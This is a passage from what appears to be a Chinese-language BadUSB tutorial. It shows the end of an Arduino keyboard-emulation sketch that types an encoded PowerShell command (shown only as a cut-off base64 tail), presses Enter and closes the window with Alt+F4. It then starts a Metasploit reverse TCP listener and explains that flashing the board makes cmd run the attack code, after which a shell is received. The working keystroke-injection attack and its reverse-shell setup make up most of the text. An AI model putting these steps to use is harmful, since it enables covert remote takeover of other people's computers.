AOgA6AFMAdABhAHIAdAAoACQAcwApADsA");
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);
delay(700);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
// Ending stream
Keyboard.end();
}
/* Unused endless loop */
void loop() {}
启动监听
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.59.128:4455
再次烧录
烧录完成后cmd弹出输入攻击代码,然后收到shell
